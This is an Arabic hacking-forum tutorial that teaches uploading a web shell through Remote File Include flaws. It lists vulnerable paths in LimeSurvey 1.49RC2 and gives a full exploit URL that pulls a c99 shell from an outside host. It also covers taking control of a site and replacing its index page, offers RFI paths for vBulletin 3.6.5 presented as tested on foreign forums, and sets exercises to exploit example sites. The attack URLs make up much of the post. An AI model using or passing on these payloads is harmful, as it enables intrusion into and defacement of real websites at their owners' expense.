حالة الموضوع:
مغلق
  1. τєғα сσđ

    τєғα сσđ ExpErt DeveloPer

    الأنتساب:
    ‏8 مارس 2012
    المشاركات:
    54
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    ĿĘåяמ ҺāĆҝĕĐ
    الإقامة:
    من تراب
    [​IMG]

    [​IMG]

    كيف الحال يا شباب عساكم بخير ان شاء الله

    يا طويلين العمر عرفنا وش هو السيرفر وعرفنا وش هو الموقع

    الحين واحد فيكم يسأل سؤال وجيه

    حنا نبي موقع على السيرفر ليش تقول شيل عالسيرفر ؟؟

    الجواب : لأن يمكن نقدر نرفع الشيل في مجلد الموقع المستهدف

    اللي هو

    كود PHP:
    /home/ksa/public_html
    ويمكن ما نقدر عليه

    لذلك نرفعه بأي منطقة ثانية على السيرفر اهم شي انه بنفس جهاز الكمبيوتر

    كيييييييييييييييييف ؟؟؟

    في عدة طرق انا راح اشرح اليوم طريقة

    ام الطرق الثانية راح تكون في درس منفصل بإذن الله

    الطريقة اللي راح اشرحها الحين وهي عن طريق [ الثغرات ]

    يعني نرفع شيل من خلال ثغره

    طبعاً الثغرات أنواع كثيره ولازم الواحد يتعمق فيها لكن دورتنا ما راح اشرح الثغرات كلها

    راح اشرح اسهل نوع من انواع الثغرات ويأدي الغرض اللي نبيه ..

    وهو ثغرات الـ File Include ( الفايل انكلود ) أو بالعربي ادراج ملف

    يمكننا البحث عن الثغرات في مواقع الحماية وانا انصح بهذي المواقع

    www.exploit-db.com
    www.securityreason.com

    لأن البحث عن الثغرات فيها بسيط وهي من اقوى المواقع في نفس الوقت

    طبعاً انا راح اشرح كيف يتم استغلال ثغرات الفايل انكلود

    نختار ثغرة من الميل ورم مثلاً

    هذي الثغره

    http://
    www.exploit-db.com/exploits/4156

    تعالوا نطلع عليها

    نشوف هالأشياء

    فيها اسم المكتشف ووو .. لكن شوفوا هالخانات

    كود PHP:
    ## Script site : www.limesurvey.org
    ## Script name : LimeSurvey (PHPSurveyor)
    ## Version : 1.49RC2
    Script site = موقع مبرمج السكريبت
    Script name = اسم السكربت المصاب
    Version = الاصدار المصاب

    طيب واحد يقول لنا يا بو عابد وش هو السكريبت ؟

    السكريبت هو برنامج مبرمج بلغة الـ php مثل سكربت المنتدى وسكربت البطاقات .. الخ

    الحين الثغره اللي عرضتها فوق يقول لنا في سكريبت اسمه LimeSurvey فيه ثغرة فايل انكلود

    يعني نقدر ندرج من خلالها شيل .. او بالأصح اي موقع مركب هالسكريبت نقدر نرفع فيه شيل

    تعالوا نكمل نشوف الثغره

    نشوف هالخانه

    كود PHP:
    ## Type : RFI(Remote File Include)
    = النوع

    مثل ماهوب ظاهر لنا ريموت فايل انكلود ( يعني ادراج ملف عن بعد )

    واختصارها RFI وهي أول حرف من كلمة كلمة

    المهم عرفنا انها فايل انكلود اتركوا كل الكلام لأنه ما يفيدنا

    اهم شي في الثغره نعرفه

    هو

    1- اسم السكريبت المصاب . ( عرفنا في ثغرتنا انه اسم السكريبت المصاب هو LimeSurvey  )
    2- الاصدار المصاب . ( عرفنا في ثغرتنا فوق ان الاصدار المصاب هو 1.49RC2 )
    3- نوع الثغره . ( عرفنا فوق ان الثغرات اللي حنا نشرح عليها فايل انكلود أي ثغرات ثانية استغلالها مختلف  )
    4- الاستغلال .

    الحين عرفنا كل الأنواع أين الاستغلال

    تعالوا نرجع لصفحة الثغره هنا

    http://
    www.exploit-db.com/exploits/4156

    ابحثوا عن عبارة Exploit وتعني ( الاستغلال )

    انا لقيتها
    كود PHP:
    ## Exploit :
    نلاحظ ان فيه اكثر من استغلال

    وهذي هي الاستغلالات

    كود PHP:
    ## /admin/classes/pear/OLE/PPS/File.php?homedir=[s h e l l]
    ## /admin/classes/pear/OLE/PPS/Root.php?homedir=[s h el l]
    ## /admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=[s h el l]
    ## /admin/classes/pear/OLE/PPS.php?homedir=[s h e l l]
    ## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=[s h el l]
    ## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=[s h e l l]
    ## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=[s h e l l]
    ## /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=[*****]
    ## /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=[s h e l
    l]
    ناخذ استغلال من الاستغلالات
    /admin/classes/pear/OLE/PPS/File.php?homedir=[*****]
    تعالوا نحلل الاستغلال هذا
    admin = مجلد
    classes = مجلد آخر
    pear = مجلد ثاني آخر
    OLE = مجلد ثالث آخر
    PPS = مجلد رابع آخر .. يا ليل البعارين
    File.php = الملف المصاب

    تعالوا نترجم الاستغلال

    يقول لك الاستغلال ادخل مجلد admin داخله بتلقى مجلد classes ادخله وبتلقى داخله مجلد ثاني pear ادخله وداخله بتلقى مجلد ثالث OLE

    ادخله وداخله بتلقى مجلد PPS داخل هالمجلد بتلقى ملف File.php وهو الملف المصاب

    طيب ترجمنا الاستغلال ترى ما نحتاج الترجمه بس عشان تفهمون لا أكثر ولا أقل

    لو جينا وقلنا هذا موقع

    www.hack15.com

    سكريبت LimeSurvey اصداره 1.49RC2 راكب عليه هنا

    www.hack15.com/ls

    وحنا عندنا ثغرة نرفع الشيل تعالوا نستغلها

    بما ان السكريبت داخل مجلد ls في الموقع

    راح يكون تطبيقنا كذا

    كود PHP:
    www.hack15.com/ls/admin/classes/pear/OLE/PPS/File.php?homedir=[s h el l]
    هذا هو الاستغلال
    الحين كل اللي علينا نستبدل عبارة
    [*****]
    برابط شيل مرفوع على اي موقع بامتداد txt
    لو انا مثلاً رافع شيل على موقع
    بامتداد txt
    كمثال شوف
    http://younes.by.ru/c99.txt
    هذا شيل c99 مرفوع على موقع
    لاحظوا ان امتداده هو
    txt
    وليس
    php
    وهذا أمر مهم جداً لأننا نريد سحب الأكواد من المفكرة وترجمتها بالموقع المصاب
    وليس قراءة الملف في الموقع اللي رافعين عليه الشيل
    الاستغلال بيكون كذا


    كود PHP:
    www.hack15.com/ls/admin/classes/pear/OLE/PPS/File.php?homedir=http://younes.by.ru/c99.txt?
    لاتنسوا عند الادراج تضعون علامة الاستفاهم في نهاية الاستغلال
    تعالوا نترجم الأمر اللي سويناه
    لو الحين فتحنا الصفحة هذي

    كود PHP:
    www.hack15.com/ls/admin/classes/pear/OLE/PPS/File.php?homedir=http://younes.by.ru/c99.txt?
    بيعرض لنا الشيل اللي حنا رافعينه على موقع ثاني ولكن بينعرض على موقع شبكة عراق تيم
    تعالوا نحلل الاستغلال ثاني
    حنا الحين من خلال ثغرة في سكريبت مرفوع على موقع شبكة عراق تيم

    أمرنا السكريبت بأن يقوم بإدراج أكواد هذي الصفحة
    http://younes.by.ru/c99.txt
    داخل شبكة عراق تيم
    وقراءتها على سيرفر شبكة عراق تيم

    يعني انه بيسحب أكواد الشيل ويشغله على شبكة عراق تيم !!:{

    وبكذا بيعرض لنا الشيل على شبكة عراق تيم وحنا في الحقيقه ما رفعناه على الموقع كل اللي سويناه عرض على الموقع

    ونقدر نتحكم بالموقع كامل من خلال هالطريقه .. وكذلك لو كان في مجلد مصرح 777 تقدر ترفع فيه الشيل على المواقع او صفحتك او اي شي

    الحين نجي لدرسنا السابق وهو الصلاحيات الحين لو عرضنا الشيل على على شبكة عراق تيم

    وطلعت لنا الصلاحية = hack15 هذا يعني ان صلاحيتنا يوزر عالموقع يعني نقدر نتحكم في مجلد شبكة عراق تيم

    يعني ما يحتاج تصريح 777 تقدر ترفع اندكسك بالصفحة الرئيسية وتلعب بالموقع كامل لعب لأن صلاحيتك حالياً هي يوزر يعني مالك الموقع

    وبكذا نكون انتهينا من شرح استغلال ثغرات الفايل انكلود والحمد لله

    قبل ما اطلع من الدرس حاب اعطيكم هدية بسيطه
    [​IMG]
    جاني واحد من الشباب وعطاني هالثغره
    ثغرتين فايل انكلود تساعدك لرفع شل على نسخة ال 3.6.5 vb
    الثغره مجربه علي اكثر من منتدي اجنبي


    كود PHP:
    vb/includes/functions_cron.php?nextitem=s h el l

    vb
    /includes/functions.php?classfile=s h e l l

    vb
    /includes/functions_forumdisplay.php?specialtemplatess h e l l
    مثال على الاستغلال :-
    http://www.hack15.com/vb/includes/fu...cialtemplates= s h el l
    لا تنسى استبدال ***** برابط شيل txt ولاتنسى علامة الاستفاهم واحلى اختراق
    [​IMG]
    تعالوا ما انتهينا يا حلوين .. هع مافي راحة

    اسئلة اليوووم ^_^

    حنا شرحنا فوق الثغره وانا شرحت استغلال واحد من الاستغلالات

    الحين راع اعطي أمثلة مواقع ( وهمية )

    هذي مواقع نفترض انها مركبة السكريبت والسكريبت فيها موجود بمجلد ss

    هذي هي

    www.soper.com/ss
    www.ksa.com/ss
    www.sos.com/ss
    www.7looo.com/ss

    ابيكم ترجعون تشوفون الاستغلالات فوق وتستغلونها على هذي المواقع

    وكل استغلال مختلف عن الثاني يعني لا يجي واحد يطبق لي نفس الاستغلال غلى المواقع كلها

    ويكون الاستغلال كامل مع الشيل وكل شي ..

    مثال على استغلال كامل

    كود PHP:
    www.hack15.com/ls/admin/classes/pear/OLE/PPS/File.php?homedir=http://younes.by.ru/c99.txt?
    والله يوفقكم اخواني الأعزاء &:"

    [​IMG]
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة